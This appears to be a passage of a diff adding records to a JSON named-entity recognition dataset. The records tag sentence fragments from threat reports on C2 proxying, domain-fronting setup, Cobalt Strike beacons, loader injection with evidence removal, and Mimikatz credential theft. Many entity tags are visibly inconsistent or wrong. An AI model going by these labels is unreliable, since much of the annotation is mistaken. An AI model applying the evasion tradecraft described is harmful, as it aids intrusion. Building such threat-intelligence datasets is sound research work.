"configuration", + "to", + "registry,", + "this", + "value", + "is", + "set", + "to", + "“default”", + "and", + "is", + "later", + "manually", + "changed", + "by", + "the", + "actor" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "the", + "operators", + "were", + "able", + "to", + "access", + "their", + "primary", + "target", + "via", + "RDP", + "connections" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "operators", + "were", + "able", + "to", + "access", + "their", + "primary", + "target", + "via", + "RDP", + "connections", + "from", + "a", + "trusted", + "third", + "party", + "using", + "stolen", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "configured", + "to", + "proxy", + "C2", + "traffic" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "configured", + "to", + "proxy", + "C2", + "traffic" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "other", + "victim", + "networks", + "to", + "proxy", + "their", + "C2", + "instructions,", + "likely", + "to", + "minimize", + "the", + "risk", + "of", + "detection", + "and", + "blend", + "in", + "with", + "normal", + "network", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "acting", + "as", + "proxies", + "to", + "relay", + "communications", + "to", + "their", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "usually", + "to", + "the", + "victim’s", + "domain", + "name" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "read", + "and", + "decrypt", + "those", + "registry", + "key", + "values", + "for", + "proper", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "needs", + "to", + "read", + "and", + "decrypt", + "those", + "registry", + "key", + "values" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "obfuscate", + "the", + "source", + "of", + "the", + "activity." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "tool", + "called", + "“anti.exe”", + "to", + "stop", + "Windows", + "Update", + "service", + "and", + "terminate", + "EDR", + "and", + "Antivirus", + "related", + "services." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "leverages", + "spear-phishing", + "and", + "tries", + "to", + "trick", + "the", + "victims", + "into", + "opening", + "malicious", + "documents" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "used", + "multiple", + "malicious", + "PDFs", + "and", + "MS", + "Office", + "documents", + "during", + "the", + "campaign." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "they", + "use", + "tools", + "such", + "as", + "Mimikatz", + "to", + "dump", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "remote", + "monitoring", + "software", + "such", + "as", + "ScreenConnect,", + "Remote", + "Utilities,", + "and", + "eHorus." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "they", + "added", + "a", + "new", + "tool", + "for", + "remote", + "access,", + "Syncro,", + "to", + "their", + "arsenal." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "disguises", + "itself", + "as", + "a", + "legitimate", + "Google", + "Update", + "executable." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "collects", + "the", + "victim’s", + "username" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "computer", + "name" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "IP", + "address" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Domain", + "fronting", + "is", + "another", + "method", + "for", + "concealing", + "communication", + "between", + "the", + "endpoint", + "and", + "the", + "command", + "and", + "control", + "servers." + ], + "ner_tags": [ + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "purpose", + "of", + "domain", + "fronting", + "is", + "to", + "connect", + "to", + "a", + "restricted", + "host", + "while", + "pretending", + "to", + "communicate", + "with", + "an", + "allowed", + "host" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "masks", + "your", + "traffic", + "to", + "a", + "certain", + "website", + "by", + "masquerading", + "it", + "as", + "a", + "different", + "domain." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Domain", + "fronting", + "was", + "mostly", + "used", + "by", + "web", + "services", + "to", + "bypass", + "censorship", + "in", + "several", + "countries", + "that", + "restricted", + "traffic" + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp" + ] + }, + { + "tokens": [ + "attackers", + "have", + "started", + "using", + "this", + "technique", + "to", + "hide", + "their", + "malicious", + "infrastructure", + "behind", + "legitimate", + "domains" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "fronting", + "possible", + "by", + "allowing", + "the", + "operators", + "to", + "configure", + "related", + "settings", + "via", + "the", + "malleable", + "C2", + "profiles" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Setup", + "the", + "CDN", + "service", + "to", + "create", + "a", + "new", + "CDN", + "endpoint", + "and", + "redirect", + "traffic", + "to", + "your", + "domain." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Identify", + "a", + "domain", + "that", + "uses", + "the", + "same", + "CDN", + "to", + "ensure", + "that", + "the", + "traffic", + "will", + "be", + "forwarded", + "to", + "the", + "correct", + "resource." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Setup", + "a", + "profile", + "to", + "facilitate", + "domain", + "fronting" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "legitimate", + "website", + "will", + "forward", + "the", + "traffic", + "through", + "the", + "CDN", + "to", + "the", + "original", + "destination", + "according", + "to", + "the", + "host", + "header." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "fronting" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "fronting" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "fronting" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "fronting" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "malleable", + "C2", + "profiles", + "are", + "configured", + "to", + "allow", + "domain", + "fronting", + "using", + "the", + "Fastly", + "and", + "AzureEdge", + "CDNs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "domain", + "fronting" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "fronting" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "fronting" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "fronting", + "appears", + "to", + "be", + "used", + "by", + "threat", + "actors." + ], + "ner_tags": [ + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Attackers", + "can", + "use", + "legitimate", + "domains", + "that", + "are", + "registered", + "under", + "the", + "same", + "CDN", + "provider." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "HTTP/HTTPS", + "C2", + "traffic" + ], + "ner_tags": [ + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "communication", + "between", + "the", + "Beacon", + "and", + "the", + "Cobalt", + "Strike", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "other", + "compromised", + "host", + "running", + "the", + "parent", + "HTTP", + "Beacon" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "Parent", + "Beacon" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "customized", + "for", + "the", + "HTTP-POST", + "Block" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Encrypting", + "and", + "encoding", + "the", + "data", + "with", + "XOR", + "mask", + "and", + "random", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "use", + "their", + "beacon", + "sessions", + "to", + "establish", + "RDP", + "access" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "attackers", + "was", + "to", + "establish", + "a", + "Remote", + "Desktop", + "session" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "establishing", + "a", + "RDP", + "session,", + "including", + "the", + "ability", + "to", + "navigate", + "using", + "a", + "graphical", + "environment", + "and", + "easily", + "move", + "laterally", + "once", + "the", + "necessary", + "access", + "has", + "been", + "granted" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attacker’s", + "Kali", + "Linux", + "host", + "to", + "RDP", + "into", + "our", + "target’s", + "environment" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDP", + "into", + "the", + "target", + "host" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "beacon", + "acts", + "as", + "the", + "intermediary", + "to", + "facilitate", + "the", + "Remote", + "Desktop", + "session" + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMB", + "beacons", + "open", + "a", + "local", + "port", + "on", + "the", + "target", + "host", + "and", + "listen", + "for", + "incoming", + "communication", + "from", + "a", + "parent", + "beacon" + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMB", + "beacons", + "are", + "mostly", + "used", + "to", + "make", + "network", + "detection", + "harder", + "and", + "to", + "get", + "access", + "to", + "isolated", + "systems", + "where", + "communication", + "to", + "the", + "internet", + "is", + "prohibited" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "SMB", + "Beacon", + "is", + "communicating", + "over", + "the", + "network", + "with", + "a", + "parent", + "Beacon", + "using", + "named", + "pipes." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "see", + "the", + "named", + "pipe", + "created", + "that", + "we", + "specified", + "on", + "the", + "Cobalt", + "Strike", + "interface", + "when", + "we", + "created", + "the", + "SMB", + "listener." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "RDP", + "into", + "the", + "target", + "host", + "using", + "reverse", + "proxy" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "using", + "reverse", + "proxy" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "reverse", + "proxy" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reverse", + "Proxy", + "using", + "Cobalt", + "Strike", + "Beacon" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "ability", + "to", + "run", + "a", + "SOCKS", + "proxy", + "server", + "on", + "the", + "team", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "enables", + "the", + "operators", + "to", + "setup", + "a", + "listening", + "port", + "and", + "leverage", + "it", + "to", + "relay", + "traffic", + "to", + "and", + "from", + "the", + "open", + "beacon", + "session" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attackers", + "take", + "advantage", + "of", + "this", + "technique", + "using", + "proxychains" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "employ", + "proxychains", + "from", + "the", + "attacker’s", + "Kali", + "Linux", + "host" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "via", + "reverse", + "proxy." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "be", + "configured", + "as", + "a", + "proxy" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "use", + "their", + "beacon", + "sessions", + "to", + "establish", + "RDP", + "access", + "through", + "a", + "reverse", + "proxy" + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "victim’s", + "hostname", + "is", + "captured", + "in", + "this", + "logon", + "event" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "execute", + "the", + "command", + "systeminfo", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "took", + "148", + "packets", + "containing", + "DNS", + "requests", + "and", + "responses", + "to", + "finish", + "the", + "task", + "and", + "send", + "back", + "the", + "data", + "to", + "the", + "Cobalt", + "Strike", + "Server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SecTeam", + "O" + ] + }, + { + "tokens": [ + "which", + "will", + "then", + "send", + "the", + "results", + "to", + "the", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SSL", + "can", + "be", + "used", + "to", + "complicate", + "command-and-control", + "(C2)", + "traffic", + "analysis" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "replacing", + "an", + "early", + "call", + "instruction", + "to", + "their", + "malicious", + "code,", + "or", + "by", + "overwriting", + "the", + "entry", + "point", + "in", + "the", + "PE", + "header" + ], + "ner_tags": [ + "B-Way", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "unpack", + "any", + "additional", + "payloads," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTPS", + "and", + "other", + "protocols", + "built", + "on", + "SSL", + "have" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "service", + "using", + "HTTPS" + ], + "ner_tags": [ + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SSL", + "encrypted", + "traffic" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TLS", + "encrypted", + "data" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "detect", + "when", + "TLS", + "connections", + "are", + "being", + "initiated", + "and", + "log", + "the", + "symmetric", + "keys", + "generated", + "for", + "the", + "SSL/TLS", + "connection" + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "TLS", + "traffic," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "network", + "traffic" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "HTTPS", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypt" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "SSL", + "encrypted", + "traffic" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TLS", + "encrypted", + "data" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "the", + "next", + "stage", + "from", + "a", + "public", + "file", + "storage", + "service" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "embeds", + "the", + "next", + "stages", + "of", + "the", + "execution", + "inside", + "an", + "additional", + "file,", + "usually", + "an", + "XML", + "or", + "a", + "PDF", + "file." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Tool", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "that", + "embeds", + "the", + "Crypter", + "with", + "the", + "payload." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "actor", + "embeds", + "the", + "malicious", + "code", + "inside", + "different", + "legitimate", + "codes." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "enables", + "an", + "HTTPS", + "connection." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Once", + "downloaded", + "and", + "executed,", + "the", + "malicious", + "installer", + "copies", + "its", + "compressed", + "files", + "into", + "a", + "newly", + "created", + "folder", + "with", + "a", + "legitimate-looking", + "name", + "(i.e.,", + "IIS", + "Application", + "Health", + "Monitor)", + "in", + "one", + "of", + "the", + "following", + "directory", + "paths:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "At", + "first", + "glance,", + "the", + "files", + "within", + "the", + "directory", + "may", + "seem", + "legitimate" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Write", + "a", + "registry", + "Run", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Write", + "a.lnk", + "file", + "in", + "the", + "startup", + "folder" + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "registry", + "run", + "key", + "persistence", + "implementation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Decryption", + "Shellcode" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Decryption", + "shellcode", + "has", + "three", + "main", + "tasks:", + "first,", + "it", + "extracts", + "the", + "Loader", + "shellcode", + "and", + "the", + "payload,", + "then", + "it", + "decrypts", + "them,", + "and", + "finally,", + "it", + "transfers", + "the", + "execution", + "to", + "the", + "decrypted", + "Loader", + "shellcode." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "shellcode", + "execution", + "flow" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Decryption", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "it", + "using", + "the", + "denoted", + "decryption", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "payload", + "address" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "encrypted", + "additional", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "these", + "are", + "encrypted", + "and", + "split", + "inside", + "the", + "XML." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "user", + "will", + "be", + "encouraged", + "to", + "download", + "a", + "malicious", + "installer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deceive", + "the", + "user", + "into", + "thinking", + "that", + "the", + "application", + "has", + "failed", + "to", + "execute,", + "even", + "as", + "it", + "silently", + "continues", + "the", + "malicious", + "execution", + "in", + "the", + "background." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shellcode", + "is", + "to", + "inject", + "the", + "decrypted", + "payload", + "within", + "the", + "currently", + "running", + "process", + "(itself)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "Loader", + "overwrites", + "the", + "current", + "PE", + "with", + "the", + "final", + "payload’s", + "PE" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "It", + "does", + "so", + "by", + "copying", + "the", + "PE", + "headers", + "and", + "each", + "section", + "according", + "to", + "the", + "current", + "executable’s", + "base", + "address." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "Loader", + "copies", + "the", + "new", + "PE", + "headers", + "to", + "the", + "base", + "address", + "and", + "each", + "section", + "to", + "the", + "relevant", + "location", + "according", + "to", + "the", + "IMAGE_SECTION_HEADER" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "import", + "address", + "table", + "and", + "relocation", + "table", + "of", + "the", + "newly", + "injected", + "PE." + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "newly", + "injected", + "PE" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Loader", + "removes", + "evidence", + "of", + "injection", + "by", + "using", + "the", + "following", + "methods:", + "Update", + "the", + "LDR", + "data", + "table", + "entry", + "to", + "match", + "the", + "injected", + "PE.", + "Remove", + "the", + "injected", + "PE", + "headers", + "from", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "disable", + "system", + "defenses" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "process", + "list", + "checked", + "is", + "as", + "follows" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "services", + "running", + "on", + "the", + "compromised", + "system", + "are", + "checked", + "against", + "the", + "following", + "list" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "credentials", + "also", + "allow", + "BlackCat", + "to", + "move", + "laterally", + "within", + "the", + "victim’s", + "system", + "and/or", + "network,", + "often", + "with", + "administrative", + "privileges." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "ransomware", + "to", + "deploy", + "additional", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "such", + "as", + "Mimikatz" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "utilizes", + "a", + "unique", + "onion", + "domain" 